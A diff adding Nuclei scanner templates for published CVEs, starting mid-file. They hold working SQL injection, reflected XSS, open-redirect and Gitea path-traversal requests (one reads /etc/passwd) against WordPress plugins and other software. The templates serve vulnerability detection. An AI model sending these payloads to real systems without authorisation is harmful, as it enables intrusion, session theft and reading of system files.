- 'status_code_2 == 200'
- 'contains(all_headers_2, "text/html")'
- 'contains(body_2, "><script>alert(document.domain)</script>")'
- 'contains(body_2, "ere_property_gallery")'
condition: and

View File

@ -0,0 +1,38 @@
id: CVE-2022-4117
info:
name: IWS Geo Form Fields <= 1.0 - Unauthenticated SQL Injection
author: theamanrawat
severity: high
description: |
The IWS WordPress plugin through 1.0 does not properly escape a parameter before using it in a SQL statement via an AJAX action available to unauthenticated users, leading to an unauthenticated SQL injection.
reference:
- https://wpscan.com/vulnerability/1fac3eb4-13c0-442d-b27c-7b7736208193
- https://wordpress.org/plugins/iws-geo-form-fields/
- https://nvd.nist.gov/vuln/detail/CVE-2022-4117
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2022-4117
cwe-id: CWE-89
metadata:
verified: "true"
tags: cve,cve2022,sqli,wordpress,wp-plugin,wp,iws-geo-form-fields
requests:
- raw:
- |
@timeout: 15s
POST /wp-admin/admin-ajax.php?action=iws_gff_fetch_states HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
country_id=1%20AND%20(SELECT%2042%20FROM%20(SELECT(SLEEP(6)))b)
matchers:
- type: dsl
dsl:
- 'duration>=6'
- 'status_code == 200'
- 'contains(body, "\"status\":200") && contains(body, "{\"html\":")'
condition: and

View File

@ -0,0 +1,42 @@
id: CVE-2022-4320
info:
name: WordPress Events Calendar Plugin - Cross-Site Scripting
author: r3Y3r53
severity: medium
description: |
WordPress Events Calendar Plugin < 1.4.5 - Multiple Reflected XSS
remediation: Fixed in version 1.4.5
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2022-4320
- https://wpscan.com/vulnerability/f1244c57-d886-4a6e-8cdb-18404e8c153c
metadata:
verified: true
tags: cve,cve2022,wordpress,wp,wp-plugin,calendar,event,xss
requests:
- method: GET
path:
- '{{BaseURL}}/wp-admin/admin-ajax.php?action=cdaily&subaction=cd_calendar&id=XX"><script>alert(document.cookie)</script>'
- '{{BaseURL}}/wp-admin/admin-ajax.php?action=cdaily&subaction=cd_dismisshint&callback=<script>alert(document.cookie)</script>'
- '{{BaseURL}}/wp-admin/admin-ajax.php?action=cdaily&subaction=cd_displayday&callback=1&bymethod=&by_id=/../../../../../../r%26_=--><script>alert(document.cookie)</script>'
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'imgNavLeftXX\"><script>alert(document.cookie)</script>'
- '<script>alert(document.cookie)</script>({});'
- '><script>alert(document.cookie)</script>.js'
condition: or
- type: word
part: header
words:
- "text/html"
- type: status
status:
- 200

View File

@ -0,0 +1,44 @@
id: CVE-2022-4325
info:
name: Post Status Notifier Lite < 1.10.1 - Cross Site Scripting
author: r3Y3r53
severity: medium
description: |
The Post Status Notifier Lite WordPress plugin before 1.10.1 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which can be used against high privilege users such as admin.
remediation: Fixed in version 1.10.1
reference:
- https://wpscan.com/vulnerability/5b983c48-6b05-47cf-85cb-28bbeec17395
- https://wordpress.org/plugins/post-status-notifier-lite/
- https://nvd.nist.gov/vuln/detail/CVE-2022-4325
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2022-4325
cwe-id: CWE-79
metadata:
verified: "true"
tags: cve,cve2022,xss,wp,wp-plugin,wordpress,post-status-notifier-lite,authenticated
requests:
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In
- |
GET /wp-admin/options-general.php?page=post-status-notifier-lite&controller=%3Cscript%3Ealert%28%60document.domain%60%29%3C%2Fscript%3E HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true
matchers:
- type: dsl
dsl:
- 'status_code_2 == 200'
- 'contains(all_headers_2, "text/html")'
- 'contains(body_2, "<script>alert(`document.domain`)</script>")'
- 'contains(body_2, "Post Status Notifier Lite")'
condition: and

View File

@ -0,0 +1,42 @@
id: CVE-2023-0236
info:
name: Tutor LMS < 2.0.10 - Cross Site Scripting
author: r3Y3r53
severity: medium
description: |
The Tutor LMS WordPress plugin before 2.0.10 does not sanitise and escape the reset_key and user_id parameters before outputting then back in attributes, leading to Reflected Cross-Site Scripting which could be used against high privilege users such as admin.
remediation: Fixed in version 2.0.10
reference:
- https://wpscan.com/vulnerability/503835db-426d-4b49-85f7-c9a20d6ff5b8
- https://nvd.nist.gov/vuln/detail/CVE-2023-0236
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2023-0236
cwe-id: CWE-79
metadata:
verified: "true"
tags: cve,cve2022,xss,tutorlms,wpscan,wordpress,wp-plugin,authenticated
requests:
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In
- |
GET /dashboard/retrieve-password/?reset_key=%22%3E%3Csvg%20onload=prompt(document.domain)%3E&user_id=dd HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true
matchers:
- type: dsl
dsl:
- 'status_code_2 == 200'
- 'contains(body_2, "<svg onload=prompt(document.domain)>")'
- 'contains(body_2, "Instructor Registration")'
condition: and

View File

@ -0,0 +1,48 @@
id: CVE-2023-0261
info:
name: WP TripAdvisor Review Slider < 10.8 - Subscriber+ SQLi
author: theamanrawat
severity: high
description: |
The WP TripAdvisor Review Slider WordPress plugin before 10.8 does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by users with a role as low as subscriber.
remediation: Fixed in version 10.8
reference:
- https://wpscan.com/vulnerability/6a3b6752-8d72-4ab4-9d49-b722a947d2b0
- https://wordpress.org/plugins/wp-tripadvisor-review-slider/
- https://nvd.nist.gov/vuln/detail/CVE-2023-0261
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
cvss-score: 8.8
cve-id: CVE-2023-0261
cwe-id: CWE-89
metadata:
verified: "true"
tags: cve,cve2023,sqli,wordpress,wp-plugin,wp,wp-tripadvisor-review-slider,auth
requests:
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In
- |
@timeout: 10s
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: {{Hostname}}
content-type: application/x-www-form-urlencoded
action=parse-media-shortcode&shortcode=[wptripadvisor_usetemplate+tid="1+AND+(SELECT+42+FROM+(SELECT(SLEEP(6)))b)"]
cookie-reuse: true
matchers:
- type: dsl
dsl:
- 'duration_2>=6'
- 'status_code_2 == 200'
- 'contains(content_type_2, "application/json")'
- 'contains(body_2, "\"data\":{")'
condition: and

View File

@ -0,0 +1,44 @@
id: CVE-2023-27292
info:
name: OpenCATS - Open Redirect
author: r3Y3r53
severity: medium
description: |
An open redirect vulnerability exposes OpenCATS to template injection due to improper validation of user-supplied GET parameters.
reference:
- https://www.tenable.com/security/research/tra-2023-8
- https://nvd.nist.gov/vuln/detail/CVE-2023-27292
classification:
cve-id: CVE-2023-27292
metadata:
verified: true
shodan-query: title:"opencats"
tags: cve,cve2023,opencats,redirect,authenticated
requests:
- raw:
- |
POST /index.php?m=login&a=attemptLogin HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
username={{username}}&password={{password}}
- |
GET /index.php?m=settings&a=previewPage&url=https://oast.me HTTP/1.1
Host: {{Hostname}}
host-redirects: true
cookie-reuse: true
matchers-condition: and
matchers:
- type: word
words:
- '<TITLE>Page Preview</TITLE>'
- '<FRAME src="https://oast.me">'
condition: and
- type: status
status:
- 200

View File

@ -0,0 +1,32 @@
id: unauth-apache-kafka-ui
info:
name: Apache Kafka - Unauthorized UI Exposure
author: theamanrawat
severity: medium
description: Unauthorized access to apache kakfa UI.
reference:
- https://www.acunetix.com/vulnerabilities/web/apache-kafka-unauthorized-access-vulnerability
- https://github.com/provectus/kafka-ui
metadata:
verified: true
shodan-query: http.title:"UI for Apache Kafka"
tags: misconfig,apache,kafka,unauth,exposure
requests:
- method: GET
path:
- '{{BaseURL}}'
- '{{BaseURL}}/ui/clusters/kafka-ui/brokers'
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- '<title>UI for Apache Kafka</title>'
- type: status
status:
- 200

View File

@ -0,0 +1,60 @@
id: gitea-rce
info:
name: Gitea 1.4.0 - Remote Code Execution
author: theamanrawat
severity: critical
description: |
Gitea 1.4.0 is vulnerable to remote code execution.
reference:
- https://www.exploit-db.com/exploits/44996
- https://github.com/kacperszurek/exploits/blob/master/Gitea/gitea_lfs_rce.py
metadata:
verified: "true"
shodan-query: 'title:"Installation - Gitea: Git with a cup of tea"'
tags: gitea,rce,unauth
requests:
- raw:
- |
GET /api/v1/repos/search?limit=1 HTTP/1.1
Host: {{Hostname}}
- |
POST /{{repo}}.git/info/lfs/objects HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
Accept: application/vnd.git-lfs+json
{
"Oid": "....../../../etc/passwd",
"Size": 1000000,
"User" : "{{randstr}}",
"Password" : "{{randstr}}",
"Repo" : "{{randstr}}",
"Authorization" : "{{randstr}}"
}
- |
GET /{{repo}}.git/info/lfs/objects/......%2F..%2F..%2Fetc%2Fpasswd/sth HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: regex
part: body_3
regex:
- "root:.*:0:0:"
- type: word
part: header_3
words:
- "application/octet-stream"
extractors:
- type: regex
name: repo
group: 1
regex:
- '"name":".*","full_name":"(.*)","description"'
internal: true